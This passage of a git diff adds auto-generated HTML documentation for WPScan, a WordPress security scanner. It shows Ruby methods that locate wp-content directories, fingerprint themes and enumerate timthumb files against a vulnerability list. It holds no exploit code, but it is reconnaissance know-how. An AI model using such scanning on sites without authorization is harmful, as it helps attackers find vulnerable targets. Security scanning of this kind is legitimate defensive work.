<span class="method-name">theme</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>return <a href="WpTheme.html">WpTheme</a></p>
<div class="method-source-code" id="theme-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_target.rb, line 81</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">theme</span>
<span class="ruby-constant">WpTheme</span>.<span class="ruby-identifier">find</span>(<span class="ruby-ivar">@uri</span>)
<span class="ruby-keyword">end</span></pre>
</div><!-- theme-source -->
</div>
</div><!-- theme-method -->
<div id="url-method" class="method-detail ">
<a name="method-i-url"></a>
<div class="method-heading">
<span class="method-name">url</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>Alias of @uri.to_s</p>
<div class="method-source-code" id="url-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_target.rb, line 46</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">url</span>
<span class="ruby-ivar">@uri</span>.<span class="ruby-identifier">to_s</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- url-source -->
</div>
</div><!-- url-method -->
<div id="version-method" class="method-detail ">
<a name="method-i-version"></a>
<div class="method-heading">
<span class="method-name">version</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>return <a href="WpVersion.html">WpVersion</a></p>
<div class="method-source-code" id="version-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_target.rb, line 86</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">version</span>
<span class="ruby-constant">WpVersion</span>.<span class="ruby-identifier">find</span>(<span class="ruby-ivar">@uri</span>, <span class="ruby-identifier">wp_content_dir</span>)
<span class="ruby-keyword">end</span></pre>
</div><!-- version-source -->
</div>
</div><!-- version-method -->
<div id="wp_content_dir-method" class="method-detail ">
<a name="method-i-wp_content_dir"></a>
<div class="method-heading">
<span class="method-name">wp_content_dir</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="wp_content_dir-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_target.rb, line 90</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">wp_content_dir</span>
<span class="ruby-keyword">unless</span> <span class="ruby-ivar">@wp_content_dir</span>
<span class="ruby-identifier">index_body</span> = <span class="ruby-constant">Browser</span>.<span class="ruby-identifier">instance</span>.<span class="ruby-identifier">get</span>(<span class="ruby-ivar">@uri</span>.<span class="ruby-identifier">to_s</span>).<span class="ruby-identifier">body</span>
<span class="ruby-comment"># Only use the path because domain can be text or an ip</span>
<span class="ruby-identifier">uri_path</span> = <span class="ruby-ivar">@uri</span>.<span class="ruby-identifier">path</span>
<span class="ruby-keyword">if</span> <span class="ruby-identifier">index_body</span>[<span class="ruby-node">/#{Regexp.escape(uri_path)}\/wp-content\/(?:themes|plugins)\//</span>]
<span class="ruby-ivar">@wp_content_dir</span> = <span class="ruby-string">&quot;wp-content&quot;</span>
<span class="ruby-keyword">else</span>
<span class="ruby-ivar">@wp_content_dir</span> = <span class="ruby-identifier">index_body</span>[<span class="ruby-node">/(?:href|src)\s*=\s*(?:&quot;|').+#{Regexp.escape(uri_path)}([^&quot;']+)\/(?:themes|plugins)\/.*(?:&quot;|')/</span>, <span class="ruby-value">1</span>]
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span>
<span class="ruby-ivar">@wp_content_dir</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- wp_content_dir-source -->
</div>
</div><!-- wp_content_dir-method -->
<div id="wp_plugins_dir-method" class="method-detail ">
<a name="method-i-wp_plugins_dir"></a>
<div class="method-heading">
<span class="method-name">wp_plugins_dir</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="wp_plugins_dir-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_target.rb, line 105</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">wp_plugins_dir</span>
<span class="ruby-keyword">unless</span> <span class="ruby-ivar">@wp_plugins_dir</span>
<span class="ruby-ivar">@wp_plugins_dir</span> = <span class="ruby-node">&quot;#{wp_content_dir}/plugins&quot;</span>
<span class="ruby-keyword">end</span>
<span class="ruby-ivar">@wp_plugins_dir</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- wp_plugins_dir-source -->
</div>
</div><!-- wp_plugins_dir-method -->
<div id="wp_plugins_dir_exists-3F-method" class="method-detail ">
<a name="method-i-wp_plugins_dir_exists-3F"></a>
<div class="method-heading">
<span class="method-name">wp_plugins_dir_exists?</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="wp_plugins_dir_exists-3F-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_target.rb, line 112</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">wp_plugins_dir_exists?</span>
<span class="ruby-constant">Browser</span>.<span class="ruby-identifier">instance</span>.<span class="ruby-identifier">get</span>(<span class="ruby-ivar">@uri</span>.<span class="ruby-identifier">merge</span>(<span class="ruby-identifier">wp_plugins_dir</span>)).<span class="ruby-identifier">code</span> <span class="ruby-operator">!=</span> <span class="ruby-value">404</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- wp_plugins_dir_exists-3F-source -->
</div>
</div><!-- wp_plugins_dir_exists-3F-method -->
</div><!-- public-instance-method-details -->
</div><!-- 5Buntitled-5D -->
</div><!-- documentation -->
<div id="validator-badges">
<p><small><a href="http://validator.w3.org/check/referer">[Validate]</a></small></p>
<p><small>Generated with the <a href="http://deveiate.org/projects/Darkfish-Rdoc/">Darkfish
Rdoc Generator</a> 2</small>.</p>
</div>
</body>
</html>

489
doc/WpTheme.html Normal file
View File

@@ -0,0 +1,489 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
<title>Class: WpTheme</title>
<link rel="stylesheet" href="./rdoc.css" type="text/css" media="screen" />
<script src="./js/jquery.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/thickbox-compressed.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/quicksearch.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/darkfish.js" type="text/javascript" charset="utf-8"></script>
</head>
<body id="top" class="class">
<div id="metadata">
<div id="home-metadata">
<div id="home-section" class="section">
<h3 class="section-header">
<a href="./index.html">Home</a>
<a href="./index.html#classes">Classes</a>
<a href="./index.html#methods">Methods</a>
</h3>
</div>
</div>
<div id="file-metadata">
<div id="file-list-section" class="section">
<h3 class="section-header">In Files</h3>
<div class="section-body">
<ul>
<li><a href="./lib/wpscan/wp_theme_rb.html?TB_iframe=true&amp;height=550&amp;width=785"
class="thickbox" title="lib/wpscan/wp_theme.rb">lib/wpscan/wp_theme.rb</a></li>
</ul>
</div>
</div>
</div>
<div id="class-metadata">
<!-- Parent Class -->
<div id="parent-class-section" class="section">
<h3 class="section-header">Parent</h3>
<p class="link"><a href="WpItem.html">WpItem</a></p>
</div>
<!-- Method Quickref -->
<div id="method-list-section" class="section">
<h3 class="section-header">Methods</h3>
<ul class="link-list">
<li><a href="#method-c-find">::find</a></li>
<li><a href="#method-c-find_from_css_link">::find_from_css_link</a></li>
<li><a href="#method-c-find_from_wooframework">::find_from_wooframework</a></li>
<li><a href="#method-c-new">::new</a></li>
<li><a href="#method-i-3D-3D-3D">#===</a></li>
</ul>
</div>
</div>
<div id="project-metadata">
<div id="fileindex-section" class="section project-section">
<h3 class="section-header">Files</h3>
<ul>
<li class="file"><a href="./CREDITS.html">CREDITS</a></li>
<li class="file"><a href="./Gemfile.html">Gemfile</a></li>
<li class="file"><a href="./README.html">README</a></li>
</ul>
</div>
<div id="classindex-section" class="section project-section">
<h3 class="section-header">Class/Module Index
<span class="search-toggle"><img src="./images/find.png"
height="16" width="16" alt="[+]"
title="show/hide quicksearch" /></span></h3>
<form action="#" method="get" accept-charset="utf-8" class="initially-hidden">
<fieldset>
<legend>Quicksearch</legend>
<input type="text" name="quicksearch" value=""
class="quicksearch-field" />
</fieldset>
</form>
<ul class="link-list">
<li><a href="./Array.html">Array</a></li>
<li><a href="./Browser.html">Browser</a></li>
<li><a href="./BruteForce.html">BruteForce</a></li>
<li><a href="./CacheFileStore.html">CacheFileStore</a></li>
<li><a href="./Exploit.html">Exploit</a></li>
<li><a href="./Generate_List.html">Generate_List</a></li>
<li><a href="./GitUpdater.html">GitUpdater</a></li>
<li><a href="./Malwares.html">Malwares</a></li>
<li><a href="./Object.html">Object</a></li>
<li><a href="./RpcClient.html">RpcClient</a></li>
<li><a href="./SvnUpdater.html">SvnUpdater</a></li>
<li><a href="./Svn_Parser.html">Svn_Parser</a></li>
<li><a href="./Updater.html">Updater</a></li>
<li><a href="./UpdaterFactory.html">UpdaterFactory</a></li>
<li><a href="./Vulnerable.html">Vulnerable</a></li>
<li><a href="./WebSite.html">WebSite</a></li>
<li><a href="./WpConfigBackup.html">WpConfigBackup</a></li>
<li><a href="./WpDetector.html">WpDetector</a></li>
<li><a href="./WpEnumerator.html">WpEnumerator</a></li>
<li><a href="./WpFullPathDisclosure.html">WpFullPathDisclosure</a></li>
<li><a href="./WpItem.html">WpItem</a></li>
<li><a href="./WpLoginProtection.html">WpLoginProtection</a></li>
<li><a href="./WpOptions.html">WpOptions</a></li>
<li><a href="./WpPlugin.html">WpPlugin</a></li>
<li><a href="./WpPlugins.html">WpPlugins</a></li>
<li><a href="./WpReadme.html">WpReadme</a></li>
<li><a href="./WpTarget.html">WpTarget</a></li>
<li><a href="./WpTheme.html">WpTheme</a></li>
<li><a href="./WpThemes.html">WpThemes</a></li>
<li><a href="./WpTimthumbs.html">WpTimthumbs</a></li>
<li><a href="./WpUser.html">WpUser</a></li>
<li><a href="./WpUsernames.html">WpUsernames</a></li>
<li><a href="./WpVersion.html">WpVersion</a></li>
<li><a href="./WpVulnerability.html">WpVulnerability</a></li>
<li><a href="./WpscanOptions.html">WpscanOptions</a></li>
</ul>
<div id="no-class-search-results" style="display: none;">No matching classes.</div>
</div>
</div>
</div>
<div id="documentation">
<h1 class="class">WpTheme</h1>
<div id="description" class="description">
</div><!-- description -->
<div id="5Buntitled-5D" class="documentation-section">
<!-- Attributes -->
<div id="attribute-method-details" class="method-section section">
<h3 class="section-header">Attributes</h3>
<div id="style_url-attribute-method" class="method-detail">
<a name="style_url"></a>
<div class="method-heading attribute-method-heading">
<span class="method-name">style_url</span><span
class="attribute-access-type">[R]</span>
</div>
<div class="method-description">
</div>
</div>
<div id="version-attribute-method" class="method-detail">
<a name="version"></a>
<div class="method-heading attribute-method-heading">
<span class="method-name">version</span><span
class="attribute-access-type">[R]</span>
</div>
<div class="method-description">
</div>
</div>
</div><!-- attribute-method-details -->
<!-- Methods -->
<div id="public-class-method-details" class="method-section section">
<h3 class="section-header">Public Class Methods</h3>
<div id="find-method" class="method-detail ">
<a name="method-c-find"></a>
<div class="method-heading">
<span class="method-name">find</span><span
class="method-args">(target_uri)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="find-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_theme.rb, line 44</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword">self</span>.<span class="ruby-identifier">find</span>(<span class="ruby-identifier">target_uri</span>)
<span class="ruby-keyword">self</span>.<span class="ruby-identifier">methods</span>.<span class="ruby-identifier">grep</span>(<span class="ruby-regexp">/find_from_/</span>).<span class="ruby-identifier">each</span> <span class="ruby-keyword">do</span> <span class="ruby-operator">|</span><span class="ruby-identifier">method_to_call</span><span class="ruby-operator">|</span>
<span class="ruby-identifier">theme</span> = <span class="ruby-keyword">self</span>.<span class="ruby-identifier">send</span>(<span class="ruby-identifier">method_to_call</span>, <span class="ruby-identifier">target_uri</span>)
<span class="ruby-keyword">return</span> <span class="ruby-identifier">theme</span> <span class="ruby-keyword">if</span> <span class="ruby-identifier">theme</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">nil</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- find-source -->
</div>
</div><!-- find-method -->
<div id="new-method" class="method-detail ">
<a name="method-c-new"></a>
<div class="method-heading">
<span class="method-name">new</span><span
class="method-args">(options = {})</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="new-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_theme.rb, line 25</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">initialize</span>(<span class="ruby-identifier">options</span> = {})
<span class="ruby-identifier">options</span>[<span class="ruby-value">:vulns_file</span>] = (<span class="ruby-identifier">options</span>[<span class="ruby-value">:vulns_file</span>] <span class="ruby-operator">!=</span> <span class="ruby-keyword">nil</span> <span class="ruby-keyword">and</span> <span class="ruby-identifier">options</span>[<span class="ruby-value">:vulns_file</span>] <span class="ruby-operator">!=</span> <span class="ruby-string">&quot;&quot;</span>) <span class="ruby-operator">?</span>
<span class="ruby-identifier">options</span>[<span class="ruby-value">:vulns_file</span>] <span class="ruby-operator">:</span> <span class="ruby-constant">DATA_DIR</span> <span class="ruby-operator">+</span> <span class="ruby-string">&quot;/wp_theme_vulns.xml&quot;</span>
<span class="ruby-identifier">options</span>[<span class="ruby-value">:vulns_xpath</span>] = <span class="ruby-string">&quot;//theme[@name='$name$']/vulnerability&quot;</span>
<span class="ruby-identifier">options</span>[<span class="ruby-value">:type</span>] = <span class="ruby-string">&quot;themes&quot;</span>
<span class="ruby-ivar">@version</span> = <span class="ruby-identifier">options</span>[<span class="ruby-value">:version</span>]
<span class="ruby-ivar">@style_url</span> = <span class="ruby-identifier">options</span>[<span class="ruby-value">:style_url</span>]
<span class="ruby-keyword">super</span>(<span class="ruby-identifier">options</span>)
<span class="ruby-keyword">end</span></pre>
</div><!-- new-source -->
</div>
</div><!-- new-method -->
</div><!-- public-class-method-details -->
<div id="protected-class-method-details" class="method-section section">
<h3 class="section-header">Protected Class Methods</h3>
<div id="find_from_css_link-method" class="method-detail ">
<a name="method-c-find_from_css_link"></a>
<div class="method-heading">
<span class="method-name">find_from_css_link</span><span
class="method-args">(target_uri)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>Discover the wordpress theme name by parsing the css link rel</p>
<div class="method-source-code" id="find_from_css_link-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_theme.rb, line 60</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword">self</span>.<span class="ruby-identifier">find_from_css_link</span>(<span class="ruby-identifier">target_uri</span>)
<span class="ruby-identifier">response</span> = <span class="ruby-constant">Browser</span>.<span class="ruby-identifier">instance</span>.<span class="ruby-identifier">get</span>(<span class="ruby-identifier">target_uri</span>.<span class="ruby-identifier">to_s</span>, {<span class="ruby-value">:follow_location</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-keyword">true</span>, <span class="ruby-value">:max_redirects</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-value">2</span>})
<span class="ruby-identifier">matches</span> = <span class="ruby-regexp">%{https?://[^&quot;']+/themes/([^&quot;']+)/style.css}</span>.<span class="ruby-identifier">match</span>(<span class="ruby-identifier">response</span>.<span class="ruby-identifier">body</span>)
<span class="ruby-keyword">if</span> <span class="ruby-identifier">matches</span>
<span class="ruby-identifier">style_url</span> = <span class="ruby-identifier">matches</span>[<span class="ruby-value">0</span>]
<span class="ruby-identifier">theme_name</span> = <span class="ruby-identifier">matches</span>[<span class="ruby-value">1</span>]
<span class="ruby-keyword">return</span> <span class="ruby-identifier">new</span>(<span class="ruby-value">:name</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">theme_name</span>,
<span class="ruby-value">:style_url</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">style_url</span>,
<span class="ruby-value">:base_url</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">style_url</span>,
<span class="ruby-value">:path</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-string">&quot;&quot;</span>,
<span class="ruby-value">:wp_content_dir</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-string">&quot;&quot;</span>
)
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- find_from_css_link-source -->
</div>
</div><!-- find_from_css_link-method -->
<div id="find_from_wooframework-method" class="method-detail ">
<a name="method-c-find_from_wooframework"></a>
<div class="method-heading">
<span class="method-name">find_from_wooframework</span><span
class="method-args">(target_uri)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p><a
href="http://code.google.com/p/wpscan/issues/detail?id=141">code.google.com/p/wpscan/issues/detail?id=141</a></p>
<div class="method-source-code" id="find_from_wooframework-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_theme.rb, line 78</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword">self</span>.<span class="ruby-identifier">find_from_wooframework</span>(<span class="ruby-identifier">target_uri</span>)
<span class="ruby-identifier">body</span> = <span class="ruby-constant">Browser</span>.<span class="ruby-identifier">instance</span>.<span class="ruby-identifier">get</span>(<span class="ruby-identifier">target_uri</span>.<span class="ruby-identifier">to_s</span>).<span class="ruby-identifier">body</span>
<span class="ruby-identifier">regexp</span> = <span class="ruby-regexp">%{&lt;meta name=&quot;generator&quot; content=&quot;([^\s&quot;]+)\s?([^&quot;]+)?&quot; /&gt;\s+&lt;meta name=&quot;generator&quot; content=&quot;WooFramework\s?([^&quot;]+)?&quot; /&gt;}</span>
<span class="ruby-identifier">matches</span> = <span class="ruby-identifier">regexp</span>.<span class="ruby-identifier">match</span>(<span class="ruby-identifier">body</span>)
<span class="ruby-keyword">if</span> <span class="ruby-identifier">matches</span>
<span class="ruby-identifier">woo_theme_name</span> = <span class="ruby-identifier">matches</span>[<span class="ruby-value">1</span>]
<span class="ruby-identifier">woo_theme_version</span> = <span class="ruby-identifier">matches</span>[<span class="ruby-value">2</span>]
<span class="ruby-identifier">woo_framework_version</span> = <span class="ruby-identifier">matches</span>[<span class="ruby-value">3</span>] <span class="ruby-comment"># Not used at this time</span>
<span class="ruby-keyword">return</span> <span class="ruby-identifier">new</span>(<span class="ruby-value">:name</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">woo_theme_name</span>,
<span class="ruby-value">:version</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">woo_theme_version</span>,
<span class="ruby-value">:base_url</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">matches</span>[<span class="ruby-value">0</span>],
<span class="ruby-value">:path</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-string">&quot;&quot;</span>,
<span class="ruby-value">:wp_content_dir</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-string">&quot;&quot;</span>
)
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- find_from_wooframework-source -->
</div>
</div><!-- find_from_wooframework-method -->
</div><!-- protected-class-method-details -->
<div id="public-instance-method-details" class="method-section section">
<h3 class="section-header">Public Instance Methods</h3>
<div id="3D-3D-3D-method" class="method-detail ">
<a name="method-i-3D-3D-3D"></a>
<div class="method-heading">
<span class="method-name">===</span><span
class="method-args">(wp_theme)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="3D-3D-3D-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_theme.rb, line 53</span>
<span class="ruby-keyword">def</span> <span class="ruby-operator">===</span>(<span class="ruby-identifier">wp_theme</span>)
<span class="ruby-identifier">wp_theme</span>.<span class="ruby-identifier">name</span> <span class="ruby-operator">===</span> <span class="ruby-ivar">@name</span> <span class="ruby-keyword">and</span> <span class="ruby-identifier">wp_theme</span>.<span class="ruby-identifier">version</span> <span class="ruby-operator">===</span> <span class="ruby-ivar">@version</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- 3D-3D-3D-source -->
</div>
</div><!-- 3D-3D-3D-method -->
</div><!-- public-instance-method-details -->
</div><!-- 5Buntitled-5D -->
</div><!-- documentation -->
<div id="validator-badges">
<p><small><a href="http://validator.w3.org/check/referer">[Validate]</a></small></p>
<p><small>Generated with the <a href="http://deveiate.org/projects/Darkfish-Rdoc/">Darkfish
Rdoc Generator</a> 2</small>.</p>
</div>
</body>
</html>

361
doc/WpTimthumbs.html Normal file
View File

@@ -0,0 +1,361 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
<title>Module: WpTimthumbs</title>
<link rel="stylesheet" href="./rdoc.css" type="text/css" media="screen" />
<script src="./js/jquery.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/thickbox-compressed.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/quicksearch.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/darkfish.js" type="text/javascript" charset="utf-8"></script>
</head>
<body id="top" class="module">
<div id="metadata">
<div id="home-metadata">
<div id="home-section" class="section">
<h3 class="section-header">
<a href="./index.html">Home</a>
<a href="./index.html#classes">Classes</a>
<a href="./index.html#methods">Methods</a>
</h3>
</div>
</div>
<div id="file-metadata">
<div id="file-list-section" class="section">
<h3 class="section-header">In Files</h3>
<div class="section-body">
<ul>
<li><a href="./lib/wpscan/modules/wp_timthumbs_rb.html?TB_iframe=true&amp;height=550&amp;width=785"
class="thickbox" title="lib/wpscan/modules/wp_timthumbs.rb">lib/wpscan/modules/wp_timthumbs.rb</a></li>
</ul>
</div>
</div>
</div>
<div id="class-metadata">
<!-- Method Quickref -->
<div id="method-list-section" class="section">
<h3 class="section-header">Methods</h3>
<ul class="link-list">
<li><a href="#method-i-has_timthumbs-3F">#has_timthumbs?</a></li>
<li><a href="#method-i-targets_url_from_theme">#targets_url_from_theme</a></li>
<li><a href="#method-i-timthumbs">#timthumbs</a></li>
</ul>
</div>
</div>
<div id="project-metadata">
<div id="fileindex-section" class="section project-section">
<h3 class="section-header">Files</h3>
<ul>
<li class="file"><a href="./CREDITS.html">CREDITS</a></li>
<li class="file"><a href="./Gemfile.html">Gemfile</a></li>
<li class="file"><a href="./README.html">README</a></li>
</ul>
</div>
<div id="classindex-section" class="section project-section">
<h3 class="section-header">Class/Module Index
<span class="search-toggle"><img src="./images/find.png"
height="16" width="16" alt="[+]"
title="show/hide quicksearch" /></span></h3>
<form action="#" method="get" accept-charset="utf-8" class="initially-hidden">
<fieldset>
<legend>Quicksearch</legend>
<input type="text" name="quicksearch" value=""
class="quicksearch-field" />
</fieldset>
</form>
<ul class="link-list">
<li><a href="./Array.html">Array</a></li>
<li><a href="./Browser.html">Browser</a></li>
<li><a href="./BruteForce.html">BruteForce</a></li>
<li><a href="./CacheFileStore.html">CacheFileStore</a></li>
<li><a href="./Exploit.html">Exploit</a></li>
<li><a href="./Generate_List.html">Generate_List</a></li>
<li><a href="./GitUpdater.html">GitUpdater</a></li>
<li><a href="./Malwares.html">Malwares</a></li>
<li><a href="./Object.html">Object</a></li>
<li><a href="./RpcClient.html">RpcClient</a></li>
<li><a href="./SvnUpdater.html">SvnUpdater</a></li>
<li><a href="./Svn_Parser.html">Svn_Parser</a></li>
<li><a href="./Updater.html">Updater</a></li>
<li><a href="./UpdaterFactory.html">UpdaterFactory</a></li>
<li><a href="./Vulnerable.html">Vulnerable</a></li>
<li><a href="./WebSite.html">WebSite</a></li>
<li><a href="./WpConfigBackup.html">WpConfigBackup</a></li>
<li><a href="./WpDetector.html">WpDetector</a></li>
<li><a href="./WpEnumerator.html">WpEnumerator</a></li>
<li><a href="./WpFullPathDisclosure.html">WpFullPathDisclosure</a></li>
<li><a href="./WpItem.html">WpItem</a></li>
<li><a href="./WpLoginProtection.html">WpLoginProtection</a></li>
<li><a href="./WpOptions.html">WpOptions</a></li>
<li><a href="./WpPlugin.html">WpPlugin</a></li>
<li><a href="./WpPlugins.html">WpPlugins</a></li>
<li><a href="./WpReadme.html">WpReadme</a></li>
<li><a href="./WpTarget.html">WpTarget</a></li>
<li><a href="./WpTheme.html">WpTheme</a></li>
<li><a href="./WpThemes.html">WpThemes</a></li>
<li><a href="./WpTimthumbs.html">WpTimthumbs</a></li>
<li><a href="./WpUser.html">WpUser</a></li>
<li><a href="./WpUsernames.html">WpUsernames</a></li>
<li><a href="./WpVersion.html">WpVersion</a></li>
<li><a href="./WpVulnerability.html">WpVulnerability</a></li>
<li><a href="./WpscanOptions.html">WpscanOptions</a></li>
</ul>
<div id="no-class-search-results" style="display: none;">No matching classes.</div>
</div>
</div>
</div>
<div id="documentation">
<h1 class="module">WpTimthumbs</h1>
<div id="description" class="description">
</div><!-- description -->
<div id="5Buntitled-5D" class="documentation-section">
<!-- Methods -->
<div id="public-instance-method-details" class="method-section section">
<h3 class="section-header">Public Instance Methods</h3>
<div id="has_timthumbs-3F-method" class="method-detail ">
<a name="method-i-has_timthumbs-3F"></a>
<div class="method-heading">
<span class="method-name">has_timthumbs?</span><span
class="method-args">(theme_name, options = {})</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="has_timthumbs-3F-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/modules/wp_timthumbs.rb, line 24</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">has_timthumbs?</span>(<span class="ruby-identifier">theme_name</span>, <span class="ruby-identifier">options</span> = {})
<span class="ruby-operator">!</span><span class="ruby-identifier">timthumbs</span>(<span class="ruby-identifier">theme_name</span>, <span class="ruby-identifier">options</span>).<span class="ruby-identifier">empty?</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- has_timthumbs-3F-source -->
</div>
</div><!-- has_timthumbs-3F-method -->
<div id="timthumbs-method" class="method-detail ">
<a name="method-i-timthumbs"></a>
<div class="method-heading">
<span class="method-name">timthumbs</span><span
class="method-args">(theme_name = nil, options = {})</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="timthumbs-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/modules/wp_timthumbs.rb, line 28</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">timthumbs</span>(<span class="ruby-identifier">theme_name</span> = <span class="ruby-keyword">nil</span>, <span class="ruby-identifier">options</span> = {})
<span class="ruby-keyword">if</span> <span class="ruby-ivar">@wp_timthumbs</span>.<span class="ruby-identifier">nil?</span>
<span class="ruby-identifier">options</span>[<span class="ruby-value">:type</span>] = <span class="ruby-string">&quot;timthumbs&quot;</span>
<span class="ruby-identifier">options</span>[<span class="ruby-value">:only_vulnerable_ones</span>] = <span class="ruby-keyword">false</span>
<span class="ruby-identifier">options</span>[<span class="ruby-value">:file</span>] = <span class="ruby-identifier">options</span>[<span class="ruby-value">:file</span>] <span class="ruby-operator">||</span> <span class="ruby-constant">DATA_DIR</span> <span class="ruby-operator">+</span> <span class="ruby-string">&quot;/timthumbs.txt&quot;</span>
<span class="ruby-identifier">options</span>[<span class="ruby-value">:vulns_file</span>] = <span class="ruby-string">&quot;xxx&quot;</span>
<span class="ruby-identifier">options</span>[<span class="ruby-value">:vulns_xpath</span>] = <span class="ruby-string">&quot;xxx&quot;</span>
<span class="ruby-identifier">options</span>[<span class="ruby-value">:vulns_xpath_2</span>] = <span class="ruby-string">&quot;xxx&quot;</span>
<span class="ruby-constant">WpOptions</span>.<span class="ruby-identifier">check_options</span>(<span class="ruby-identifier">options</span>)
<span class="ruby-keyword">if</span> <span class="ruby-identifier">theme_name</span> <span class="ruby-operator">==</span> <span class="ruby-keyword">nil</span>
<span class="ruby-identifier">custom_items</span> = <span class="ruby-keyword">nil</span>
<span class="ruby-keyword">else</span>
<span class="ruby-identifier">custom_items</span> = <span class="ruby-identifier">targets_url_from_theme</span>(<span class="ruby-identifier">theme_name</span>, <span class="ruby-identifier">options</span>)
<span class="ruby-keyword">end</span>
<span class="ruby-ivar">@wp_timthumbs</span> = <span class="ruby-constant">WpEnumerator</span>.<span class="ruby-identifier">enumerate</span>(<span class="ruby-identifier">options</span>, <span class="ruby-identifier">custom_items</span>)
<span class="ruby-keyword">end</span>
<span class="ruby-ivar">@wp_timthumbs</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- timthumbs-source -->
</div>
</div><!-- timthumbs-method -->
</div><!-- public-instance-method-details -->
<div id="protected-instance-method-details" class="method-section section">
<h3 class="section-header">Protected Instance Methods</h3>
<div id="targets_url_from_theme-method" class="method-detail ">
<a name="method-i-targets_url_from_theme"></a>
<div class="method-heading">
<span class="method-name">targets_url_from_theme</span><span
class="method-args">(theme_name, options)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="targets_url_from_theme-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/modules/wp_timthumbs.rb, line 49</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">targets_url_from_theme</span>(<span class="ruby-identifier">theme_name</span>, <span class="ruby-identifier">options</span>)
<span class="ruby-identifier">targets</span> = []
<span class="ruby-identifier">theme_name</span> = <span class="ruby-constant">URI</span>.<span class="ruby-identifier">escape</span>(<span class="ruby-identifier">theme_name</span>)
<span class="ruby-node">%{
